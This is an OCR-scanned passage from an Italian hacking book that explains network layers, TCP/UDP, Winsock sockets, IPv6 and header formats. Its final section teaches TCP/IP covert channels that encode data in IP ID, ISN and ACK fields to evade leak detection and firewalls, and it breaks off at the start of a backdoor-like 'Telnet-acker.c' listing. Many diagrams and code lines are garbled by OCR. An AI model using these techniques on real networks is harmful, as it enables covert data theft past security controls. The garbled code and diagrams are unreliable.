A questo livello vengono definite le regole per la trasmissione e la ricezione delle 
informazioni. 

Il fine di questo strato e' quello di garantire che i messaggi vengano consegnati al dispositivo 
giusto e di tradurre i dati in bits in modo tale da poterli far trasferire dal livello fisico. 
Possiamo concepire questo strato come la porta tra il mondo hardware e software. 
Tra i protocolli più comuni che utilizzano questo strato ritroviamo HDLC, reti geografiche 
ATM, Microsoft NDIS ecc. 

Strato fisico 

Le uniche due funzioni a questo livello sono quelle di trasmettere e ricevere bit tramite 
differenti tipi di infrastrutture e di dispositivi di trasmissione. 

Riassumendo potremmo fare una panoramica su tutte le operazioni che vengono fatte a 
ciascun livello sul pacchetto originale dei dati 

• STRATO APPLICAZIONE Aggiunta indirizzo del nodo 

• STRATO PRESENTAZIONE Aggiunta informazioni codice 

• STRATO SESSIONE Aggiunta informazioni di comunicazione 

• STRATO DI TRASPORTO Aggiunta intestazione e checksum 

• STRATO DI RETE Aggiunta informazioni quantità' e sequenza 
pacchetti 

• STRATO DI LINK Aggiunta checksum finale 

• STRATO FISICO Invio dati some sequenza di bit 




Ad ogni strato sono definite delle serie di funzioni specifiche con le quali I' applicativo 
interagisce nelP istante in cui ha bisogno di inviare delle informazioni ad un altro sistema della 
rete. 

La richiesta e le informazioni vengono impacchettate e inviate allo strato successivo il quale 
aggiunge al pacchetto le informazioni relative alle funzioni gestite a quel livello. 
Vediamo ora i quattro starti del modello DoD 

Strato di processo 

Questo strato corrisponde ai primi tre del modello OSI. 

Gran parte del lavoro di trasmissione viene svolto a questo livello per cui vengono coinvolti un 
gran numero di protocolli. 

Tra i nomi più' comuni dei protocolli ritroviamo TELNET, FTP, SMTP, NFS, X WINDOW ecc. 
Telnet ad esempio e' in pratica un emulazione di terminale. 
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Tramite Telnet un client può' accedere ad un'altra macchina su cui e' in esecuzione un server 

Telnet e lavorare come se fosse un terminale collegato direttamente. 

FTP (File Transfer Protocol) e' essenzialmente un protocollo di trasferimento files. 

Questo protocollo può' essere utilizzato da un altro software per il trasferimento di softwares 

oppure può fungere come programma indipendente e quindi eseguire la navigazione nelle 

directories del sistema a cui si e' connessi, gestire il trasferimento files ecc. 

Vedremo successivamente le funzioni implementate nella libreria sun.net.ftp presente in 

Java. 

Ne programma di esempio utilizzeremo anche le classi di sun.net.smtp che sono quelle che 
gestiscono il protocollo che si interessa della gestione della posta elettronica (SMTP). 



Application 
(HTTP, ftp, telnet, ...) 



Transport 
(TCP, UDP, ...) 



Network 
(IP,...) 



Link 
(device driver, ...) 



Strato di host 

Le funzioni di questo livello sono paragonabili a quelle dello strato di trasporto del modello 
OSI. 

A questo livello vengono gestiti il controllo di integrità' e della sequenza dei pacchetti 
trasmessi. 

Infatti e' proprio a questo strato che incontriamo i protocolli TCP e UDP. 
Il protocollo viene caricato come si trattasse di un driver software. 

Protocollo TCP 

Il protocollo TCP (Transmission Control Protocol) suddivide in segmenti i blocchi di 
informazioni generati da un software, li numera, li ordina in modo da permettere il 
riassemblaggio degli stessi una volta giunti a destinazione. 

La trasmissione di questi segmenti e' subordinata alla ricezione di segnali di conferma atti a 
segnalare la corretta ricezione degli stessi. 

TCP e' definito come protocollo orientato alla connessione in quanto prima di inviare i dati 
contatta il destinatario per stabilire la connessione creando un circuito virtuale. 
La trasmissione dei dati avviene, sommariamente, come avevamo visto precedentemente 
ovvero particolari algoritmi si interessano di verificare la correttezza dei pacchetti di dati per 
cui prima di eseguire un successivo invio il protocollo richiede conferma al destinatario. 
La comunicazione avviene in full duplex. 

Protocollo UDP 

Esistono alcune classi in Java che necessitano della conoscenza di un altro protocollo 

Il protocollo UDP (User Datagram Protocol) e' un protocollo più' "leggero" che viene utilizzato 

in alternativa a TCP. 

UDP invia in modo indipendente dei pacchetti di dati, chiamati datagrammi, da un 
applicazione ad un'altra senza garantirne I' arrivo. 

In questo caso I' ordine di invio non e' importante in quanto ogni messaggio e' indipendente 
uno dall' altro. 

Esistono delle applicazioni in cui il ricevimento dei pacchetti non é importante. 

Prendete ad esempio un sistema che invia in continuazioni informazioni sulla temperatura 

rilevata in una certa citta'. 

Se un sistema che desidera ricevere tali informazioni si perde un pacchetto non e' una cosa 
cosi critica in quanto potrà' attendere un altro invio. 
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Mentre TCP e' basato sulla connessione UDP ne e' indipendente ed e' facile comprenderlo 
da quanto detto. 



Strato di I nternet 

Questo strato corrisponde a quello di rete del modello OSI. 
In questo livello vengono gestiti gli indirizzi IP degli host. 

Una panoramica sui metodi di indirizzamento e di instradamento verranno visti tra breve. 

Tra i protocolli di questo strato ritroviamo IP (Internet Protocol), ARP (Address Resolution 

Protocol), RARP (Reverse Address Resolution Protocol) ecc. 

Strato di accesso alla rete 

Anche a questo livello del modello DoD avviene una gestione simile a quella del livello fisico 
del OSI. 

In pratica i pacchetti vengono tramutati in sequenze di bits. 

In questo strato viene anche fornita una supervisione sugli indirizzi hardware. 

Le seguenti sono alcune delle tecnologie utilizzate per implementare questo strato : 



Protocolf opcrating at cach laycr nctd to bc compatiblc 



Client 



Client Applicatio 



" "fipp'Ucift ròìi'Layci - " - 
IPfès èiitatròn La'yèr 

ScssTori'Laycr 

rfàncpòrtlayer"' 

TJfcTworK laycr" """ 

Data link' layiir""' 

TftysìcarLaycr 



4 t 

+ r> 

+ ► 

+ t 

+ ► 

+ ► 

+ ► 



HOlt 



3é 



Server Application 



' "fi ppIFctfic "nla jf "cr" 
Près cntàtion Làycr 
'"■ ■StssrónTàycr'"'" 
" "Transpò'flÉTa jjier' " 
'"' " Hci I wó'rB ' L'd yel r" " " 1 



'"□HaTmk'TbyciF" 



Per fare maggiore chiarezza su quelli che sono i concetti di protocolli oritentati alla 
connessione e quelli che invece funzionano in modo completamente asincrono possiamo 
vedere qualche metodo che permetta di usare praticamente i concetti. 
Questi esempi sono relativi alla chiamate di base necessarie per creare un sistema di 
comunicazione tra servers e clients. 
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Trans miss ion over the Network 



Abbiamo detto che un server è un processo che attende perché un certo numero di client si 
connetta per eseguire le funzionalità proprie del software. 
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Application l< end-to-end connection >/ Application 

/ / 

TCP l< vlrtual clrcult >/ TCP 

/ / 

IP l< — DG — >/ IP l< — DG — >/ IP 

/ / + / / 

Subnetwork: 1 /< > / Subnetl / Subnet2 / < >/ Subnetwork 2 

HOST GATEWAY HOST 



I servers devono mettersi in ascolto di quello che è il sistema di identificazione del client il 
quale, nel caso del TCP, è di fatto l'indirizzo e la porta dell'interfaccia. 
All'interno dei nostri applicativi possiamo richiedere una comunicazione con questa mediante 
l'uso delle funzioni di socket. 

Nel caso di Windows abbiamo a che fare con le funzioni Winsock le quali per essere utilizzate 
devono eseguire come primo passo quello di creare un socket utilizzante un determinato 
protocollo relativo a questo indirizzo/porta. 

Sempre parlando del server, il secondo passo è quello di fare mettere in ascolto il socket in 
attesa di un tentativo di comunicazione da parte del client. 
La funzione bind() è definita come segue : 



Una connessione veien eseguita come segue : 

SOCKET s; 

struct sockaddr_in tcpaddr; 
int port = 2222; 

S = socket (AF_INET, SOCK_ STREAM, IPPROTO_TCP) ; 

tcpaddr . s±n_family = AF_INET; 

tcpaddr . sin _port = htons (port) ; 

tcpaddr . sin_addr . s_addr = htonl (INADDR_ANY) ; 



La struttura sockaddrjn ha la seguente struttura: 



struct sockaddr_in { 

short sin_family; 
u_short sin__port; 
struct in_addr sin_addr; 




L' uso di C++Builder rende l'uso dei socket semplicissimo in quanto sia le connessioni TCP 
che UDP sono presenti tra i componenti visuali all'interno della toolbar e quindi basta inserire 
dentro ad un form quello relativo al tipo di connessione che si vuole gestire. 
Continuando la panoramica sulle funzioni necessarie per la comunicazione client/server 
troviamo la funzione listen utilizzata per mettere il socket in modalità di ascolto. 

int listen (SOCKET s, int backlog) ; 

Il parametro backlog indica la lunghezza massima della coda relativa alle connessioni in 
attesa. 

Questo parametro asume una particolare importanza quando potrebbero essere iniate al 
server un numero multiplo di richieste di connessione. 
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Il primo argomento chiaramente è il socket a cui ci si riferisce. 

Un'altra funzione necessaria per accettare una connessione client è accept oppure la 

WSAAccept in ambiente Windows il cui prototipo è : 

SOCKET accept (SOCKET s. struct sockaddr FAR* addr, int FAR* addrlen) ; 

Il parametro s è il socket in ascolto mentre il secondo deve essere l'indirizzo di una struttura 
SOCKADDRJN valida con addrlen relativo alla sua lunghezza. 

Se vi trovaste la necessità di usare le funzioni con un altro protocollo sarà sufficiente che 
sostituiate la struttura SOCKADDRJN con la SOCKADDR relativa a quello scelto. 
Quando la funzione ritorna la struttura SOCKADDRJN contiene l'indirizzo IP del client che ha 
eseguito la richiesta di collegamento fino a quando addrlen indica la presenza mediante la 
dimensione della struttura. 

WINSOCK 2 ha introdotto la funzione WSAccept la quale possiede la seguente sintassi: 
SOCKET WSAAccept (SOCKET s, struct sockaddr FAR *addr, LPINT addrlen, 



I primi tre parametri sono gli stessi della funzione acept() di WINSOCK 1 mentre 
IpfnCondiction è un puntatoread una funzione che viene chiamata a seguito di una richiesta 
del client. 

Questa funzione determina se accettare la richiesta di connessione del client. 

II prototipo della funzione è : 

int CALLBACK CondictionFunction ( LPWSABUF lpCallerld, 

LPWSABUF lpCallerld, 
LPQOS IpSQOS, 
LPQOS lpGQOS, 
LPWSABUF lpCalledld, 
LPWSABUF IpCalleeData, 
GROUP far *g, 




Il paramentro lpCallerld è in pratica l'indirizzo dell'entità che si connette rappresentato da una 
struttura comunemente usata con WINSOCK 2 dichiarata come : 



typedef struct _WSABUF { 

ujong len; 

char FAR *buf; 
} WSABUF, FAR * LPWSABUF; 



A seconda dell'uso il parametro len stà ad indicare la dimnsione del buffer puntato da buf 
oppure il totale dei dati contenuti dentro al buffer dati buf. 

Usato dentro al parametro lpCallerld il puntatore buf punta all'indirizzo della struttura per il 
protocollo scelto nella quale la connessione viene creata. 

Per un corretto accesso alle informazioni il punatore buf viene forzato con un casyt alla 
coretta tipologia SOCKADDR. 

Il parametro IpCallerData contiene qualsiasi dato inviato dal client durante la richiesta di 
connessione. 

I successivi due parametri IpSQOS e lpGQOS specificano la qualità del servizio. 
Ambedue i parametri si riferiscono ad una struttura QOS che contiene informazioni relative 
alla banda richiestasia per quello che riguarda i dati ricevuti che quelli trasmessi. 
LpCaledld contiene l'indirizzo locale al quale il client è stato connesso. 



Il livello più elevato è quello applicazione nel quale troviamo una serie di altri protocolli quali 
SMTP, FTP, HTTP, TELNET anche se di fatto il numero di questi potrebbe essere 
elevatissimo. 

TCP è un protocollo peer-to-peer orientato alla connessione. 
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Le applicazioni normalmente utilizzano per le comunicazioni il modello client/server. 

Un server è un applicazione che offre una serie di servizi agli utenti internet mentre un clientè 

un richiedente di questi. 

Un applicazione è costituita da una parte client e da un'altra server le quali possono girare 
sugli stessi sistemi o su sistemi differenti. 

Detto in altre parole un server è un programma che riceve da un client determinate richieste, 
le esegue ed invia indietro le risposte opportunamente elaborate. 

In un sistema client/server devono esistere determinate entità necessarie al funzionamento e 
al trasferimento dei pacchetti. 

Esistono diversi metodi che permettono l'accesso ad altri network. 

In un sistema di internetworking questa funzionalità viene eseguita da dei routers. 

Si devono distinguere quelli che sono i routers da quelli che sono i bridges e quelli che sono i 

gateways. 

I bridge interconnette segmenti di rete allo strato delle interfacce e invia i frames tra queste. 
Un bridge esegue le funzionalità di relay degli indirizzi MAC ed è indipendente da qualsiasi 
stato dei protocolli superiore. 
Questo è fatto per essere trasparente al protocollo IP. 

I routers invece interconnettono i networks a livello di strato di internetworking ed instradano i 
pacchetti tra questi. 

Questi impianti devono essere in grado di analizzare i pacchetti di dati che percorrono la rete 
in quanto in base a degli indirizzi riportati dentro alle strutture di testa devono prendere delle 
decisioni relative alla strada che i pacchetti devono percorrere per arrivare da un mittente ad 
un destinatario. 

Come abbiamo detto prima le basi per l'instradamento dei pacchetti viene fornito dal 
protocollo IP. 

I gateways invece forniscono un sistema di connessione di reti ad un livello più alto rispetto i 
routers e i bridge.. 

Questi supportano normalmente la mappatura degli indirizzi da un network ad un altro e 
possono inoltre provvedere ad una trasformazione dei dati tra ambienti per permettere la 
connessione delle applicazioni end-to-end. 

Sicuramente il livello di internetworking è quello in cui è possibile eseguire le manipolazioni 
dei pacchetti più complesse da individuare in quanto tali manomissioni possono interagire con 
quello che di fatto è un dei meccanismi più delicati di tutta la rete. 
Abbiamo già detto che a questo livello troviamo il protocollo IP il quale ha come funzione 
quella di instradare i pacchetti su un determinato percorso. 

Gli indirizzi visti all'inizio di questo capitolo erano relativi al metodo di gestione conosciuto con 
il termine di Ipv4. 

L'esplosione e il successo avuto da Internet ha fatto si che il corpo d'ingegneria della rete 
dovesse prendere in considerazione un metodo più evoluto capace di rappresentare un 
numero di sistemi molto maggiore di quello rappresentabile con il protocollo Ipv4. 
In pratica questo è quello conosciuto con Ipv6. 
Ma che cos'è questo Ipv6 ? 

In pratica si tratta della nuova versione del protocollo IP il cui studio è iniziato nel 1 991 e di 
cui la prima parte fondamentale è stata completata nel 1996. 

Come dicevamo prima internat è stata vittima del suo stesso successo per cui il numero di 
sistemi è diventato talmente grosso da mettere in seria difficoltà il metodo di numerazione 
convenzionale. 

Ipv6 assegna un numero da 128 bits ad ogni interfaccia di rete contro i 32 bits usati da Ipv4 
anche se di fatto la differenza più grossa sta nel fatto che Ipv4 utilizzava una NETMASK, per 
distinguere la parte della numerazione relativa alla rappresentazione della rete da quella 
legata invece al sistema, mentre Ipv6 inserisce davanti alla numerazione un prefisso il quale 
indica quanti bits vengono usati per rappresentare la sottorete. 

Volendo visualizzare l'indirizzo in formato IPV6 è possibile utilizzare la struttura definita in 
#include <netinet/in.h> 

struct in6_addr { 

u_char s6_addr [16] ; 

} 

Questa struttura viene utilizzata per la creazione della nuova struttura socket: 
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struct sockaddr_in6 { 

u_short sin6_family; 
u_short sin6_port; 
u_long s±n6flowinfo; 
struct in6_addr sin6_addr; 



L'header di Ipv4 è costituito da 24 BYTES di cui 8 relativi ad indirizzi mentre gli altri 16 
adoperati per 12 campi aggiuntivi. 

Nel caso dell'header di Ipv6 i bytes totali sono 40 di cui 32v sono relativi ad indirizzi mentre i 
rimanti 8 bytes vengono utilizzati per 6 campi aggiuntivi. 

Avevamo visto prima il comando route print che mostrava il contenuto della routing table 
relativa a Ipv4. 

Nel caso di Ipv6 questa tabella contiene una voce per ogni sottorete raggiungibile dal router 
stesso. Un esempio di organizzazione è la seguente: 



Subnetwork 


Next Hop 


Type 


Cost 


Age 


Status 
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Direct 


1 




UP 


Tau 




Direct 
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DOWN 


Beta 




Direct 
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UP 
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13 


UP 


Gamma 


Router-4 


Static 
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UP 



1 1 campo tipo indica la raggiungibilità associata alla sottorete. 

Static indica che la voce è stata aggiunta manualmente;RIP e OSPF indicano che la 

raggiungibilità è stata appresa dal router tramite appositi protocolli. 

Il campo Age indica invece la validità in secondi. 

Infine il campo Status indica appunto lo stato della voce. 

I pacchetti applicativi usano la funzione socket() per creare un descrittore socket relativo ad 
un punto finale di una comunicazione. 

I parametri passati indicano il protocollo usato insieme all'indirizzo specificato. 
In Ipv4 la sintassi di chiamata di una funzione socket è la seguente : 

s = socket (PF_INET, SOCK_ S TREAM, 0) ; 
In Ipv6 la funzione viene invece chiamata con : 
s = socket (PF_INET6, SOCK_STREAM, 0) ; 
Un indirizzo Ipv6 ha la seguente forma : 
4321 : 0:1:2: 3:4 : 567 : 89ab 



app 



app 



app 



app 
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port 


^ port 


^ port 


TCP orUDP 



Racket 



Data 



port # Data 



Tutto questo visto fino ad ora e' quanto riguarda la strutturazione di una rete. 

Esistono alcuni concetti che invece riguardano I' utente (client) che accede ad un host per 

navigare sulla rete. 
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Infatti il termine Socket esprime un terminale di comunicazione ovvero uno dei due estremi di 
una connessione. 

A questo riguardo bisogna ancora dare un occhiata al concetto di porta. 

Normalmente un computer dispone di un solo accesso fisico sulla rete. 

Tutti i dati destinati ad un sistema arrivano mediante questa connessione. 

In ogni caso i dati potrebbero essere destinati a diverse applicazioni in esecuzione sul 

sistema. 

Come può' il computer capire a quale applicazione e' destinato il pacchetto di dati ricevuto. 
Semplice. Tramite il concetto di porta ! 

I dati trasmessi su Internet sono identificati, come abbiamo già' visto, dall' indirizzo a 32 bits 
che identifica il sistema destinatario e dal numero di porta. 

II numero di porta e' costituito da un numero a 16 bits che i protocolli TCP e UDP utilizzano 
per identificare I' applicazione alla quale sono destinati i dati inviati. 

In una connessione il protocollo crea un Socket collegato ad un numero specifico di porta. 
Alcuni numeri di porta hanno degli scopi predefiniti come ad esempio : 
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Ad esempio se si creasse un Socket utilizzando la porta 25 e si inviassero dei dati tramite uno 
stream creato su questo socket questi verrebbero utilizzati dal demone per l' invio della posta. 
Infatti andando ad analizzare i sorgenti della classe sun.net.smtp, come vedremo 
successivamente, ci accorgeremmo che la gestione dell' invio della mail viene appunto 
gestita in questo modo. 
Un po' del tipo : 



Socket sock = new Socket("www.bernardotti.al.it", 25) 



I formati dei pacchetti 

I vari protocolli utilizzano dei formati specifici in quanto questi servono a definire una gran 
numero di caratteristiche tra le quali molte importantissime come ad esempio gli indirizzi del 
mittente, quello di destinazione, la lunghezza della parte dei dati e cosi via. 
In questa parte vedremo solo il formato fisico rimandando ad altri capitoli la descrizione 
specifica di questi. 

La comprensione di questi formati è alla base di alcune tecniche di hacking particolari come 
ad esempio quelle di spoofing in cui si eseguono alcune alterazioni legate agli indirizzi 
riportati all'interno di questi. 

Ogni protocollo dispone del suo formato il quale è adatto alla funzionalità propria del 
protocollo. 

Non in tutti i casi l'insieme completo delle informazii viene utilizzato tanfè vero che in alcuni 
casi le zone inutilizzate di questi pacchetti vengono usate per la messa a punto di sistemi 
particolari come quello che vedremo successivamente relativo alla trasmissione segreta delle 
informazioni. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



TCP 

0 I 1 Ì2 I 3 I 4 I 5 I 6Ì 7Ì 8 I 9 ìlOÌll 1 12 1 13 1 14 1 15 1 16 1 1 7 1 18 I 29 1 20 1 22 I 22 I 23 I 24 I 25 I 26 I 27 I 2S I 29 I 30 I 31 



Source Port 



Destination Port 



Sequence Number 



Acknowledgement Number 



D. 
Offset 



Reserved 



Control 



Window 



Checksum 



Urgent Pointer 



Options 



Padding 



UDP 



0 


1 


2 




6 


7 


8 


9 


10 


11 


12 


13 


14 


15 


16 


17 


18 


19 


20 


21 


22 


23 


24 


25 


26 


27 


28 


29 


30 


31 


Source Port 


Destination Port 


Message Length 


Checksum 



IPv. 4 



0 12 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 



Version HLen 



Service Type 



Total Length 



Identification 



Flags 



Fragment Offset 



Time To Live 



Protocol 



Header Checksum 



Source IP Address 



Destination IP Address 



IPv. 6 



0 


1 


2 


3 


4 


5 


6 


7 


8 


9 


10 


11 


12 


13 


14 


15 


16 


17 


18 


19 


20 


21 


22 


23 


24 


25 


26 


27 


28 


29 


30 


31 


Version 


Priority 












Flow 


Label 





Payload Length 



Next Header 



Hop Limit 



Source Address 



Source Address 



Source Address 



Source Address 



Destination Address 
Destination Address 



Destination Address 



Destination Address 



ARP 



0123456789 10 11 12 



13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 



Hardware Type 



Protocol Type 



HLEN 



PLEN 



Operation 



Source HW Address 



Source HW Address 



Source IP Address 



Source IP Address 



Target HW Address 



Target HW Address 



Target IP Address 



ICMP 



0123456789 10 11 12 



13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 



Type 



Code 



Identifier 



Checksum 
Sequence Number 



Address Mask 



ICMPv. 6 



0 


1 


2 


3 


4 


5 


6 


7 


8 


9 


10 


11 


12 


13 


14 


15 


16 


17 


18 


19 


20 


21 


22 


23 


[27 


\2l 






fiF 


29 


30 


31 


Type 


Code 


Checksum 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



USO DEI L TCP- I P PER LA T RAS MI SSI ONE SEGRETA DELLE I N FO RM AZ I 0 N I . 

In molti casi esistono sui sistemi dei software di analisi che cercano di evitare le fughe di 
notizie. 

Le attività degli hackers spesso sono indirizzate a attività in cui diventa necessario far 
passare le informazioni sotto il naso dei programmi di analisi. 

Ad esempio alcuni sistemi permettono di identificare le fughe di notizie da sistemi in cui sono 
memorizzati segreti industriali od altro. 

A questo punto i software che spediscono le informazioni devono necessariamente utilizzare 
sistemi per la codifica e l'ocultamento delle informazioni trasmesse. 
La comunicazione tra hosts permette di creare alcune condizioni particolari che sfruttando i 
metodo classici della trasmissione permettono di generare sistemi su cui è possibile fare 
viaggiare certi tipi di informazioni. 

Tali meccanismi sono anche importanti in quanto TCP sfrutta anche certe particolarità per 

poter controllare che i dati trasmessi siano corretti come ad esempio un numero sequenziale 

all'interno della trasmissione dei pacchetti tra un host ed un altro. 

Un canale nascosto è descritto come: "qualsiasi canale che può essere sfruttato da un 

processo per trasferire informazioni in modo da violare la linea di sicurezza di un sistema. 

Essenzialmente questo è un metodo di comunicazione che non fa parte dei disegni dei 

normali sistemi ma che può essere utilizzato per trasferire informazioni ad un utente o ad un 

processo di un sistema che normalmente non potrebbe accedere alle informazioni. 

Nel caso del TCP/IP esistono un certo numero di metodi disponibili mediante i quali possono 

essere stabiliti canali nascosti con i quali i dati possono essere passati in modo subdolo tra 

hosts. 

Questi metodi possono essere usati in una varietà di settori come ad esempio : 

Filtri di pacchetti deviati, sniffers di rete e motori di ricerca definiti con il termine di "dirty word". 
Incapsulamento di informazioni cryptate e no con altri pacchetti per la trasmissione segreta 
su reti che normalmente impedirebbero questa attività (TCP Steganografia). 

Locazioni segrete di dati trasmessi mediante "robusti" pacchetti con informazioni incapsulate 
insieme a dati di siti innocui. 

Come abbiamo già detto il TCP/IP è un protocollo che utilizza tre stati per la trasmissione e 
precisamente : 

Passo uno: Invio di un pacchetto di sincronizazione iniziale (SYNC) e numero di di sequenza. 
L'host a desidera stabilire la connessione con l'host b. 

L'host a invia un pacchetto solitario all'host b con il bit di sincronismo settato (SYN) atto ad 
annunciare la nuova connessione e con all'interno quello definito con il termine di Initial 
Sequenze Number (ISN) il quale ha come scopo quello di tracciare i pacchetti trasmessi tra 
gli hosts. 

Host A SYN (ISN) $ Host B 

Passo due: Abilitazione dell'host remoto a rispondere con un acknowledgment (ACK). 

L'host B risponde alla richiesta inviando un pacchetto con all'interno il bit di sincronismo 
(SYNC) e con ACK.. 

Questo pacchetto contiene non solo il numero di sequenza proprio del client che risponde ma 
anche il valore specificato da ISN incrementato di un unità (ISN + 1) per indicare che il 
pacchetto è stato ricevuto in modo corretto e che quindi è in attesa di una successiva 
trasmissione. 



Host A fi ----- SYN (ISN+1 )/ACK Host B 

Passo tre: Completamento della negoziazione inviando un acknowledgment finale alfhost 
remoto. 
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A questo punto l'host a invia indietro un ACK finale e il numero di sequenza per indicare la 
ricezione corretta e quindi la connessione è completa. 

Host A ACK $ Host B 

Tutto questo processo di connessione dura una manciata di millisecondi e ciascun paccheto 
a partire da questo punto è gestito da acknoledgment da ambedue la parti. 
Questo metodo di hadshake assicura una connessione chiara tra gli host. 
La sequenza completa è la seguente. 



CLIENT SERVER 



syn, SEQ=800 1 
> 2 

src_port=1967, dst_port=110 1 

1 

syn, ack, SEQ=1561 , ACK=801 1 CONNECTION 

< 2 

src_port=110 , dst_port=1967 1 ESTABLISHMENT 

1 

ack, SEQ=801, ACK=1568 1 

> 2 

src_port=1967, dst _jport=110 1 

ack, SEQ=1568, ACK=801 2 

< 2 

src _port=110, dst_port=1967 2 
DataLen=18 (POP3 Server V1.12\n) 2 

2 

ack, SEQ=801, ACK=1586 2 

> 2 

src_port=1967, dst _port=110 2 
DataLen=5 (quit\n) 2 DATA 

2 EXCHANGE 
ack, SEQ=1586, ACK=806 2 

< 2 

src_port=110, dst _port=1967 2 
DataLen=9 (Sayonara\n) 2 

2 

ack, SEQ=806, ACK=1595 2 

> 2 

src_port=1967, dst _port=110 2 

fin, ack, SEQ=806, ACK=1595 3 
> 3 

src_port=1967, dst _jport=110 3 

3 

ack, SEQ=1595, ACK=807 3 
< 3 

src_port=110, dst_port=1967 3 CONNECTION 

3 

fin, ack, SEQ=1595, ACK=807 3 TERMINATION 

< 3 

src _port=110, dst_port=1967 3 

3 

ack, SEQ=807, ACK=1596 3 
> 3 

src_port=1967 , dst _port=110 3 



È da notare che solo i pacchetti TCP utilizzano questo metodo di negoziazione. 

L'header TCP/IP contiene un certo numero di sezioni dove le informazioni possono essere 
salvate e trasmesse ad un host remoto in modo nascosto. 
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Il formato dell'header IP lo abbiamo già visto. 

Questo invece è il formato dell'header di un pacchetto TCP: 



1111111111222222222233 
01234567890123456789012345678901 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Source Port / Destinatici! Port / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Sequence Number / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Acknowledgement Number / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Offset I (reserved) / Flags / Window / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Checksum / Urgent Pointer / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Options . . . . (Padding) / 

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 
I Data... 
+-+-+-+-+-+-+-+-+-+-+-+-+- 



lin molte aree di questi header ci sono informazioni che normalmente non vengono utilizzate 
nelle normali trasmissioni in quanto sono campi opzionali 

Infatti un analisi attenta degli header permette di individuare tutte quelle zone dove i dati 
possono essere salvati e trasmessi. 

Esistono però dei cas in cui alcune aree vengono modificate per cui le zone più adatte sono 
quelle obbligatorie che di fatto possono essere ignorate. 
Queste zone sono : 



• Il campo relativo all' IP di identificazione 

• Il campo relativo al numero iniziale della sequenza TCP 

• Il campo relativo al numero di sequenza di acknoledgment 

La base della tecnica di sfruttamento di queste aree è legata alla codifica di valori ASCII. 
Utilizzando questo metodo è possibile passare dati tra host facendoli apparire come se questi 
fossero relativi alla fase iniziale di creazione della connessione o a qualche altra fase 
intermedia. 

Questi pacchetti possono non contenere dati oppure possono contenerne certi inseriti in 
modo di sembrare dati innocenti. 

Sempre gli stessi pacchetti possono conteneredati relativi ad IP di indirizzi sorgente o di 
destinazione oppure possono anche contenere i numeri di porta. 

In ogni caso questi metodi possono essere utilizzati per eseguire il tunneling di informazioni 
attraverso certi filtri di pacchetti o possono anche essere utilizzati per per inizializzare 
sessioni anonime TCP di pacchetti "rimbalzanti" attraverso siti che utilizzano soluzioni di 
controllo. 

Il primo metodo di manipolazione è relativo all'alterazione del campo di identificazione del 
protocollo IP. 

Questo campo aiuta il riassemblaggio dei pacchetti di dati da parte dei routers e dei sistemi 
host. 

Il suo scopo è quello di fornire un valore unico ai pacchetti in modo che quando avviene la 

frammentazione strada facendo questi possano essere accuratamente riassemblati. 

Il primo metodo di codifica permette di sostituire questo valore contenuto in questo campo di 

identificazione con un valore relativo alla codifica ASCII del carattere che deve essere 

codificato. 

Questo permette una facile trasmissione verso l'host il quale leggerà questo campo e lo 
ricodificherà nel carattere corretto. 

La visualizzazione con il formato di TCPDUMP è quello che segue: 



PACCHETTO UNO 
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1 8:45:1 3.551 1 1 7 host.websitek.com. 71 80 > 
host2.websitek.com.www: S 537657344:537657344(0) 
win 512 (ttl 64, id 18432) 

Decodifica.. ..(ttl 64, id 18432/256)[ASCII: 72h] 

PACCHETTO DUE 

1 8:45:1 3.551 1 1 7 host.websitek.com. 71 727 > 
host2.websitek.com.www: S 13897679854:139457344(0) 
win 512 (ttl 64, id 17664) 

Decodifica.. ..(ttl 64, id 17664/256)[ASCII: 69h] 

Il secondo metodo invece manipola il valore di ISN ovvero quello definito come Initial 
Sequence Number utilizzato dal TCP per creare una connessione sicura tra cliuent e server. 
Abbiamo visto che il sistema di negoziazione utilizza un handshake a tre vie. 
Il campo usato per contenere questo numero potrebbe essere invece usato per inserirci le 
informazioni da contrabbandare. 

Questo campo è di 32 bits per cui potrebbe essere utilizzato per salvarci dentro un 
informazione descritta da un numero dimensioni massime di un long oppure mediante 
opportune tecniche di codifica potrebbero esserci salvati dentro anche 4 caratteri di 8bits 
ciascuno. 

Il terzo metodo utilizza il campo riservato per il Acknowledge Sequenze Number. 
In questo caso l'header diventa così composto : 



IP Sorgente 






PORTA Sorgente 






IP Destinazione 






PORTA Destinazione 






TCP SYN number con i dati codificati 







Chiaramente l'utilizzo di questi metodi di codifica e decodifica pretende software client/server 
fatti appositamente. 

Riassumendo quanto detto possiamo dire che questi metodi di alterare i contenuti dei 
pacchetti possono essere utilizzati per bypassare i controlli fatti da certi firewall. 
In alcuni casi i programmi creati con questi sistemi funzionano come dei normalissimi 
TELNET con la sola differenza che non eseguono il normale TCP handshake. 
Un esempio completo è quello che segue: 



// Telnet-acker.c 




# include 


<stdio .h> 




^include 


<sys/ types . h> 




# include 


<sys/socket . h> 




^include 


<sys/time . h> 




^include 


<sys/resource . h> 




^include 


<sys/wait .h> 




^include 


<fcntl.h> 




^include 


<errno . h> 




^include 


<netinet/in . h> 




^include 


<netdb.h> 




^include 


<arpa/ inet . h> 




^include 


<sys/ioctl . h> 




#define 


QLEN 


5 


#define 


MY_PASS 


"passate " 


#define 


SERV_ TCP_PORT 


33333 
